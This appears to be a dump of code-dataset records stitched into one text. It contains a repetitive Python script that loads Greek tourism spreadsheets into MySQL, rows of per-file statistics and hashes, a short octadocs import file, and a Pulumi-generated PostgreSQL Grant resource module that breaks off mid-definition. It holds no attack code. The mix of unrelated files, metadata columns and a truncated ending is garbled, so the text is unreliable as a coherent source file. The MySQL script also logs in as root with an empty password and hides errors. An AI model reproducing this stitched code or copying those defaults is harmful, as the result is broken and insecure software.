values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2014_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2014_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠΤ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2014_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2014_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car,total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2014_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2014_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2014_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2014_d( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2014_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2015_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2015_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2015_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2015_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2015_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2015_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2015_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2015_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2015_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠΤ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2015_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2015_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2015_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2015_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚΕΜ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2015_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2015_d( number , nation, plane, train, ship, car, total ) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Create a For loop to iterate through each row in the XLS file, starting at row 2 to skip the headers
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2015_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print Insterted
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close() | 35.754729 | 202 | 0.632955 | 7,371 | 56,707 | 4.746981 | 0.018179 | 0.056588 | 0.052015 | 0.056016 | 0.997685 | 0.997685 | 0.997685 | 0.997685 | 0.997685 | 0.997685 | 0 | 0.024992 | 0.266158 | 56,707 | 1,586 | 203 | 35.754729 | 0.815831 | 0.266263 | 0 | 0.893168 | 0 | 0.049689 | 0.282049 | 0.021716 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001242 | false | 0.049689 | 0.004969 | 0 | 0.006211 | 0.099379 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fa53b22eba03c0873a52d76150ca20adb20c0ce6 | 225 | py | Python | octadocs_adr/facets/__init__.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | 1 | 2021-11-19T22:48:27.000Z | 2021-11-19T22:48:27.000Z | octadocs_adr/facets/__init__.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | 34 | 2020-12-27T11:49:08.000Z | 2021-10-05T04:58:54.000Z | octadocs_adr/facets/__init__.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | null | null | null | from octadocs_adr.facets.status import status
from octadocs_adr.facets.status_class import status_class
from octadocs_adr.facets.adr_list import adr_list
from octadocs_adr.facets.sidebar import page_sidebar, sidebar_property
| 45 | 70 | 0.884444 | 35 | 225 | 5.4 | 0.314286 | 0.253968 | 0.31746 | 0.444444 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075556 | 225 | 4 | 71 | 56.25 | 0.908654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d7429d51a96699ee3890609376af17e3572e816b | 24,145 | py | Python | sdk/python/pulumi_postgresql/grant.py | pulumi/pulumi-postgresql | 8a3b528217aafd48f58e40e4196acd0fb740bef6 | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2019-08-13T08:01:04.000Z | 2021-11-24T18:54:20.000Z | sdk/python/pulumi_postgresql/grant.py | pulumi/pulumi-postgresql | 8a3b528217aafd48f58e40e4196acd0fb740bef6 | [
"ECL-2.0",
"Apache-2.0"
] | 56 | 2019-06-21T18:31:15.000Z | 2022-03-25T20:00:13.000Z | sdk/python/pulumi_postgresql/grant.py | pulumi/pulumi-postgresql | 8a3b528217aafd48f58e40e4196acd0fb740bef6 | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2019-10-05T10:29:02.000Z | 2020-10-14T09:47:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['GrantArgs', 'Grant']
@pulumi.input_type
class GrantArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
object_type: pulumi.Input[str],
privileges: pulumi.Input[Sequence[pulumi.Input[str]]],
role: pulumi.Input[str],
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a Grant resource.
:param pulumi.Input[str] database: The database to grant privileges on for this role.
:param pulumi.Input[str] object_type: The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
:param pulumi.Input[str] role: The name of the role to grant privileges on, Set it to "public" for all roles.
:param pulumi.Input[Sequence[pulumi.Input[str]]] objects: The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
:param pulumi.Input[str] schema: The database schema to grant privileges on for this role (Required except if object_type is "database")
:param pulumi.Input[bool] with_grant_option: Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "object_type", object_type)
pulumi.set(__self__, "privileges", privileges)
pulumi.set(__self__, "role", role)
if objects is not None:
pulumi.set(__self__, "objects", objects)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if with_grant_option is not None:
pulumi.set(__self__, "with_grant_option", with_grant_option)
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The database to grant privileges on for this role.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter(name="objectType")
def object_type(self) -> pulumi.Input[str]:
"""
The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
"""
return pulumi.get(self, "object_type")
@object_type.setter
def object_type(self, value: pulumi.Input[str]):
pulumi.set(self, "object_type", value)
@property
@pulumi.getter
def privileges(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
"""
return pulumi.get(self, "privileges")
@privileges.setter
def privileges(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "privileges", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The name of the role to grant privileges on, Set it to "public" for all roles.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def objects(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
"""
return pulumi.get(self, "objects")
@objects.setter
def objects(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "objects", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input[str]]:
"""
The database schema to grant privileges on for this role (Required except if object_type is "database")
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter(name="withGrantOption")
def with_grant_option(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
return pulumi.get(self, "with_grant_option")
@with_grant_option.setter
def with_grant_option(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "with_grant_option", value)
@pulumi.input_type
class _GrantState:
def __init__(__self__, *,
database: Optional[pulumi.Input[str]] = None,
object_type: Optional[pulumi.Input[str]] = None,
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering Grant resources.
:param pulumi.Input[str] database: The database to grant privileges on for this role.
:param pulumi.Input[str] object_type: The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
:param pulumi.Input[Sequence[pulumi.Input[str]]] objects: The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
:param pulumi.Input[str] role: The name of the role to grant privileges on, Set it to "public" for all roles.
:param pulumi.Input[str] schema: The database schema to grant privileges on for this role (Required except if object_type is "database")
:param pulumi.Input[bool] with_grant_option: Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
if database is not None:
pulumi.set(__self__, "database", database)
if object_type is not None:
pulumi.set(__self__, "object_type", object_type)
if objects is not None:
pulumi.set(__self__, "objects", objects)
if privileges is not None:
pulumi.set(__self__, "privileges", privileges)
if role is not None:
pulumi.set(__self__, "role", role)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if with_grant_option is not None:
pulumi.set(__self__, "with_grant_option", with_grant_option)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The database to grant privileges on for this role.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter(name="objectType")
def object_type(self) -> Optional[pulumi.Input[str]]:
"""
The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
"""
return pulumi.get(self, "object_type")
@object_type.setter
def object_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_type", value)
@property
@pulumi.getter
def objects(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
"""
return pulumi.get(self, "objects")
@objects.setter
def objects(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "objects", value)
@property
@pulumi.getter
def privileges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
"""
return pulumi.get(self, "privileges")
@privileges.setter
def privileges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "privileges", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The name of the role to grant privileges on, Set it to "public" for all roles.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input[str]]:
"""
The database schema to grant privileges on for this role (Required except if object_type is "database")
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter(name="withGrantOption")
def with_grant_option(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
return pulumi.get(self, "with_grant_option")
@with_grant_option.setter
def with_grant_option(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "with_grant_option", value)
class Grant(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
object_type: Optional[pulumi.Input[str]] = None,
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
The ``Grant`` resource creates and manages privileges given to a user for a database schema.
See [PostgreSQL documentation](https://www.postgresql.org/docs/current/sql-grant.html)
> **Note:** This resource needs Postgresql version 9 or above.
## Usage
```python
import pulumi
import pulumi_postgresql as postgresql
readonly_tables = postgresql.Grant("readonlyTables",
database="test_db",
object_type="table",
objects=[
"table1",
"table2",
],
privileges=["SELECT"],
role="test_role",
schema="public")
```
## Examples
Revoke default accesses for public schema:
```python
import pulumi
import pulumi_postgresql as postgresql
revoke_public = postgresql.Grant("revokePublic",
database="test_db",
object_type="schema",
privileges=[],
role="public",
schema="public")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database: The database to grant privileges on for this role.
:param pulumi.Input[str] object_type: The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
:param pulumi.Input[Sequence[pulumi.Input[str]]] objects: The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
:param pulumi.Input[str] role: The name of the role to grant privileges on, Set it to "public" for all roles.
:param pulumi.Input[str] schema: The database schema to grant privileges on for this role (Required except if object_type is "database")
:param pulumi.Input[bool] with_grant_option: Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GrantArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The ``Grant`` resource creates and manages privileges given to a user for a database schema.
See [PostgreSQL documentation](https://www.postgresql.org/docs/current/sql-grant.html)
> **Note:** This resource needs Postgresql version 9 or above.
## Usage
```python
import pulumi
import pulumi_postgresql as postgresql
readonly_tables = postgresql.Grant("readonlyTables",
database="test_db",
object_type="table",
objects=[
"table1",
"table2",
],
privileges=["SELECT"],
role="test_role",
schema="public")
```
## Examples
Revoke default accesses for public schema:
```python
import pulumi
import pulumi_postgresql as postgresql
revoke_public = postgresql.Grant("revokePublic",
database="test_db",
object_type="schema",
privileges=[],
role="public",
schema="public")
```
:param str resource_name: The name of the resource.
:param GrantArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GrantArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
object_type: Optional[pulumi.Input[str]] = None,
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GrantArgs.__new__(GrantArgs)
if database is None and not opts.urn:
raise TypeError("Missing required property 'database'")
__props__.__dict__["database"] = database
if object_type is None and not opts.urn:
raise TypeError("Missing required property 'object_type'")
__props__.__dict__["object_type"] = object_type
__props__.__dict__["objects"] = objects
if privileges is None and not opts.urn:
raise TypeError("Missing required property 'privileges'")
__props__.__dict__["privileges"] = privileges
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
__props__.__dict__["schema"] = schema
__props__.__dict__["with_grant_option"] = with_grant_option
super(Grant, __self__).__init__(
'postgresql:index/grant:Grant',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
object_type: Optional[pulumi.Input[str]] = None,
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
